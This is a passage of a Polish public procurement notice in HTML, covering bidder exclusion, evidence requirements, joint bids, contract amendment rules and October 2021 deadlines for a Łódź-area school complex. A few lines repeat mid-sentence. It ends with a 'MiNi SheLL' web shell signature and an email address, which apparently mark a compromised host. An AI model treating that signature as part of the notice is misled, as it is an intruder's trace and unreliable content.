wykluczenia z postępowania wskazanych przez<br/>Zamawiającego, o których mowa w:<br/>art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>art. 108 ust.1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie<br/>publiczne tytułem środka zapobiegawczego,<br/>art. 108 ust. 1 pkt 5 ustawy Pzp dotyczących zawarcia z innymi Wykonawcami porozumienia<br/>mającego na celu zakłócenie konkurencji,<br/>art. 108 ust. 1 pkt 6 ustawy Pzp.<br/>– zgodnie z Załącznikiem nr 5 do SWZ.<br/>Pozostałe informacje znajdują się w rodziałach 10-15 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca zobowiązany jest dołączyć ww. oświadczenie o spełnianiu<br/>warunków udziału w postępowaniu – zgodnie z Załącznikiem nr 3a do SWZ. Wykonawca, który polega<br/>na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wzór zobowiązania<br/>stanowi Załącznik nr 9 do SWZ. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 11.2<br/>SWZ<br/>SWZ, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające spełnianie warunków<br/>udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby (Załącznik 3b<br/>do SWZ).<br/>Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia. Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:informacjami na temat zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór wykazu stanowi Załącznik nr 6 do SWZ.Uwaga:<br/>1) Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez Zamawiającego<br/>podmiotowych środków dowodowych, o których mowa w pkt. 11.4.2 SWZ, Wykonawca składa inne<br/>podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez<br/>Zamawiającego warunku udziału w postępowaniu dotyczącego zdolności technicznej i zawodowej.<br/>. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów<br/>publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów<br/>realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w art. 125<br/>ust. 1 ustawy Pzp dane umożliwiające dostęp do tych środków.<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo winno być załączone do oferty.<br/>2 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich<br/>nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, natomiast spełnianie<br/>warunków udziału w postepowaniu Wykonawcy wykazują zgodnie z pkt. 10.1 SWZ.<br/>3 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w pkt. 11.2 SWZ, składa każdy z Wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału, w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, który zakres przedmiotu zamówienia wykonają poszczególni<br/>Wykonawcy (zgodnie z Załącznikiem nr 10 do SWZ).<br/>5 Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>6 W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani,<br/>na wezwanie Zamawiającego złożyć aktualne na dzień złożenia podmiotowe środki dowodowe,<br/>o których mowa w pkt. 11.4 SWZ przy czym podmiotowe środki dowodowe, o których mowa w<br/>pkt 11.4.2 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/wykazują<br/>spełnianie warunku, w zakresie i na zasadach opisanych w pkt 10.1 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. W związku z art. 436 ust. 4 lit. b) Ustawy PZP Strony dokonają w formie pisemnego aneksu<br/>zmian wysokości Wynagrodzenia należnego Wykonawcy w przypadku zmiany:<br/>1) stawki podatku od towarów i usług,<br/>2) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawkigodzinowej ustalonych na podstawie przepisów Ustawy o minimalnym wynagrodzeniu za pracę,<br/>3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których<br/>mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U.<br/>2020 poz. 1342),<br/>- jeżeli ww. zmiany będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę<br/>Zmiana wysokości Wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian, o<br/>których mowa w ust. 1.<br/>2. W wypadku zmiany, o której mowa w ust. 1.1. wartość netto Wynagrodzenia nie zmieni się, a<br/>określona w aneksie wartość brutto Wynagrodzenia zostanie wyliczona na podstawie nowych<br/>przepisów.<br/>3. Zmiana, o której mowa w ust. 1.2. oraz 1.3. zostanie dokonana w następujący sposób:<br/>1) w razie zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie<br/>przepisów Ustawy o minimalnym wynagrodzeniu za pracę, przez pojęcie „odpowiedniej zmiany<br/>wynagrodzenia” należy rozumieć sumę wzrostu kosztów wykonawcy zamówienia publicznego<br/>wynikających z podwyższenia wynagrodzeń poszczególnych pracowników biorących udział w<br/>realizacji pozostałej do wykonania, w momencie wejścia w życie zmiany, części zamówienia, do<br/>wysokości wynagrodzenia minimalnego albo wysokości minimalnej stawki godzinowej,<br/>obowiązujących po zmianie przepisów lub jej odpowiedniej części, w przypadku osób<br/>zatrudnionych w wymiarze niższym niż pełen etat,<br/>2) w razie zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu<br/>zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, lub<br/>zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych przez pojęcie<br/>„odpowiedniej zmiany wynagrodzenia” należy rozumieć sumę wzrostu kosztów wykonawcy<br/>zamówienia publicznego oraz drugiej strony umowy o pracę lub innej umowy cywilnoprawnej<br/>łączącej wykonawcę zamówienia publicznego z osobą fizyczną nieprowadzącą działalności<br/>gospodarczej, wynikających z konieczności odprowadzenia dodatkowych składek od<br/>wynagrodzeń osób zatrudnionych na umowę o pracę lub na podstawie innej umowy<br/>cywilnoprawnej zawartej przez wykonawcę z osobą fizyczną nieprowadzącą działalności<br/>wynagrodzeń osób zatrudnionych na umowę o pracę lub na podstawie innej umowy<br/>cywilnoprawnej zawartej przez wykonawcę z osobą fizyczną nieprowadzącą działalności<br/>gospodarczej, a biorących udział w realizacji pozostałej do wykonania, w momencie wejścia w<br/>życie zmiany, części zamówienia przy założeniu braku zmiany wynagrodzenia netto tych osób.4. W razie zmiany wysokości kosztów ponoszonych przez Wykonawcę na realizację Usługi o co<br/>najmniej 3% w stosunku do wartości kosztów przyjętych do obliczenia obowiązującej stawki<br/>Wynagrodzenia, Wykonawcy przysługuje uprawnienie do żądania zmiany wysokości stawki<br/>Wynagrodzenia za okazaniem Zamawiającemu zestawienia obrazującego zmianę ponoszonych<br/>kosztów w związku z realizacją nin. umowy. Zmiana wysokości kosztów ustalona zostanie w<br/>oparciu o wskaźniki zmian kosztów ogłaszane przez Prezesa Głównego Urzędu Statystycznego.<br/>Wysokość wynagrodzenia może być zmieniana w okresach 12 miesięcznych. Jako termin<br/>początkowy zmiany przyjmuje się okres 12 miesięcy liczonych od dnia zawarcia umowy. Stawka<br/>Wynagrodzenia nie może być na podstawie niniejszego punktu obniżona lub podwyższona o<br/>wartość większą niż 4000 PLN brutto w stosunku do pierwotnej ceny określonej w ofercie.<br/>5. Wykonawca, którego wynagrodzenie zostało zmienione zgodnie z ust. 4zobowiązany jest do<br/>zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę.<br/>Pozost infor. w par 18 umowy - zał. 7 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-12 15:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP dostępnego pod adresem: https://epuap.gov.pl/wps/portal (Elektronicznej Skrzynki Podawczej – nazwa – ZESPÓŁ SZKÓŁ I PLACÓWEK OŚWIATOWYCH NOWOCZESNYCH TECHNOLOGII WOJEWÓDZTWA ŁÓDZKIEGO) i udostępnionego również na miniPortalu pod adresem https://miniportal.uzp.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-12 15:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com